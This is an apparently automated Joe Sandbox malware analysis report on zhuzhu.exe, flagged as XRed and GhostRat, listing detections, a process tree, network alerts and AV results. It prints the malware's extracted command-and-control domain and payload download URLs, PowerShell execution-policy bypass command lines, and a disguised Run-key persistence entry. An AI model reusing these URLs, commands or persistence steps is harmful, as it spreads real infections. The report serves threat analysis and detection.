Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zhuzhu.exe

Overview

General Information

Sample name:zhuzhu.exe
Analysis ID:1582239
MD5:675f03db23d403573a3a6f708a0e4369
SHA1:78ee9afafe6bf18d2c42d816629b6f9ed1e3ea2f
SHA256:ee4c8a187e1e1bd62abe49faece1f327dc7718c736dd1e427c025d73fa796cf8
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

GhostRat, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected XRed
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • zhuzhu.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\zhuzhu.exe" MD5: 675F03DB23D403573A3A6F708A0E4369)
    • ._cache_zhuzhu.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\._cache_zhuzhu.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)
      • ._cache_zhuzhu.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)
        • cmd.exe (PID: 7476 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7604 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7488 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7616 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • Synaptics.exe (PID: 5780 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 382B0F88502E718DFDF96DBC3AA3400A)
      • WerFault.exe (PID: 9100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 5448 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 7364 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • inst.exe (PID: 7448 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • inst.exe (PID: 7556 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • Synaptics.exe (PID: 7980 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 382B0F88502E718DFDF96DBC3AA3400A)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
zhuzhu.exeJoeSecurity_XRedYara detected XRedJoe Security
    zhuzhu.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      zhuzhu.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\Documents\DTBZGIOOSO\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
          C:\Users\user\Documents\DTBZGIOOSO\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\ProgramData\Synaptics\RCXE77E.tmpJoeSecurity_XRedYara detected XRedJoe Security
              C:\ProgramData\Synaptics\RCXE77E.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Click to see the 6 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  00000001.00000002.1772641629.0000000000403000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                      00000001.00000000.1664705656.00000000006F9000.00000008.00000001.01000000.00000005.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                          00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                            Click to see the 10 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            1.2.._cache_zhuzhu.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                              0.0.zhuzhu.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                                0.0.zhuzhu.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                                  0.0.zhuzhu.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                                    1.0.._cache_zhuzhu.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                                      Click to see the 1 entries

                                      Sigma Signatures

                                      System Summary

                                      barindex
                                      Sigma detected: Change PowerShell Policies to an Insecure Level
                                      Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7476, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 7604, ProcessName: powershell.exe
                                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\zhuzhu.exe, ProcessId: 6652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                      Sigma detected: Non Interactive PowerShell Process Spawned
                                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7476, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 7604, ProcessName: powershell.exe
                                      Sigma detected: Office Macro File Creation
                                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 5780, TargetFilename: C:\Users\user\AppData\Local\Temp\FHfEA7As.xlsm

                                      Suricata Signatures

                                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                      2024-12-30T04:59:11.886897+010020528751A Network Trojan was detected192.168.2.449766118.107.44.21919091TCP
                                      2024-12-30T05:00:28.548302+010020528751A Network Trojan was detected192.168.2.449785118.107.44.21919091TCP
                                      2024-12-30T05:01:45.453960+010020528751A Network Trojan was detected192.168.2.450264118.107.44.21919091TCP
                                      2024-12-30T05:02:54.328175+010020528751A Network Trojan was detected192.168.2.450265118.107.44.21919092TCP
                                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                      2024-12-30T04:59:08.131786+010020448871A Network Trojan was detected192.168.2.449738142.250.181.238443TCP
                                      2024-12-30T04:59:08.153938+010020448871A Network Trojan was detected192.168.2.449739142.250.181.238443TCP
                                      2024-12-30T04:59:09.101725+010020448871A Network Trojan was detected192.168.2.449744142.250.181.238443TCP
                                      2024-12-30T04:59:09.187702+010020448871A Network Trojan was detected192.168.2.449746142.250.181.238443TCP
                                      2024-12-30T04:59:10.329717+010020448871A Network Trojan was detected192.168.2.449750142.250.181.238443TCP
                                      2024-12-30T04:59:11.024552+010020448871A Network Trojan was detected192.168.2.449754142.250.181.238443TCP
                                      2024-12-30T04:59:11.404430+010020448871A Network Trojan was detected192.168.2.449756142.250.181.238443TCP
                                      2024-12-30T04:59:12.203541+010020448871A Network Trojan was detected192.168.2.449759142.250.181.238443TCP
                                      2024-12-30T04:59:12.394110+010020448871A Network Trojan was detected192.168.2.449764142.250.181.238443TCP
                                      2024-12-30T04:59:13.211852+010020448871A Network Trojan was detected192.168.2.449770142.250.181.238443TCP
                                      2024-12-30T04:59:13.368014+010020448871A Network Trojan was detected192.168.2.449772142.250.181.238443TCP
                                      2024-12-30T04:59:14.033979+010020448871A Network Trojan was detected192.168.2.449776142.250.181.238443TCP
                                      2024-12-30T04:59:14.034144+010020448871A Network Trojan was detected192.168.2.449778142.250.181.238443TCP
                                      2024-12-30T04:59:15.092751+010020448871A Network Trojan was detected192.168.2.449782142.250.181.238443TCP
                                      2024-12-30T04:59:15.117270+010020448871A Network Trojan was detected192.168.2.449781142.250.181.238443TCP
                                      2024-12-30T04:59:16.176639+010020448871A Network Trojan was detected192.168.2.449786142.250.181.238443TCP
                                      2024-12-30T04:59:16.195952+010020448871A Network Trojan was detected192.168.2.449787142.250.181.238443TCP
                                      2024-12-30T04:59:17.159058+010020448871A Network Trojan was detected192.168.2.449794142.250.181.238443TCP
                                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                      2024-12-30T04:59:08.668250+010028326171Malware Command and Control Activity Detected192.168.2.44974369.42.215.25280TCP

                                      Joe Sandbox Signatures

                                      Click to jump to signature section

                                      Show All Signature Results

                                      AV Detection

                                      barindex
                                      Antivirus / Scanner detection for submitted sample
                                      Source: zhuzhu.exeAvira: detected
                                      Source: zhuzhu.exeAvira: detected
                                      Antivirus detection for URL or domain
                                      Source: http://xred.site50.net/syn/SSLLibrary.dlDAvira URL Cloud: Label: malware
                                      Source: http://xred.site50.net/syn/Synaptics.rarhAvira URL Cloud: Label: malware
                                      Source: http://xred.site50.net/syn/SUpdate.iniAvira URL Cloud: Label: malware
                                      Source: http://xred.site50.net/syn/Synaptics.rarAvira URL Cloud: Label: malware
                                      Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                      Antivirus detection for dropped file
                                      Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                      Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                      Source: C:\ProgramData\Synaptics\RCXE77E.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                      Source: C:\ProgramData\Synaptics\RCXE77E.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                      Found malware configuration
                                      Source: zhuzhu.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                      Multi AV Scanner detection for dropped file
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                      Multi AV Scanner detection for submitted file
                                      Source: zhuzhu.exeVirustotal: Detection: 83%Perma Link
                                      Source: zhuzhu.exeReversingLabs: Detection: 92%
                                      AI detected suspicious sample
                                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                                      Machine Learning detection for dropped file
                                      Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Joe Sandbox ML: detected
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                      Source: C:\ProgramData\Synaptics\RCXE77E.tmpJoe Sandbox ML: detected
                                      Machine Learning detection for sample
                                      Source: zhuzhu.exeJoe Sandbox ML: detected

                                      Compliance

                                      barindex
                                      Detected unpacking (overwrites its own PE header)
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeUnpacked PE file: 1.2.._cache_zhuzhu.exe.400000.0.unpack
                                      Source: zhuzhu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                      Source: unknownHTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.4:49732 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49739 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49738 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49744 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49745 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49746 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49747 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49754 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49756 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49794 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49795 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49799 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49798 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49811 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49813 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49816 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49819 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49824 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49821 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49832 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49831 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49835 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49839 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49847 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49848 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49849 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49852 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49851 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49850 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49855 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49854 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49858 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49861 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49864 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49868 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49869 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49870 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49888 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49889 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49892 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49893 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49899 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49897 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49903 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49902 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49912 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49913 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49921 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49922 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49931 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49936 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49937 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49947 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49948 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49955 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49957 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49967 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49970 version: TLS 1.2
                                      Source: Binary string: \Release\Code_Shellcode.pdb source: ._cache_zhuzhu.exe, ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 00000007.00000003.1803199164.0000000003C95000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp, 360P2SP.dll.7.dr
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr
                                      Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 00000007.00000000.1759892249.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000000.1770278594.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000002.1778901612.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: z:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: x:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: v:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: t:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: r:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: p:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: n:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: l:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: j:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: h:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: f:
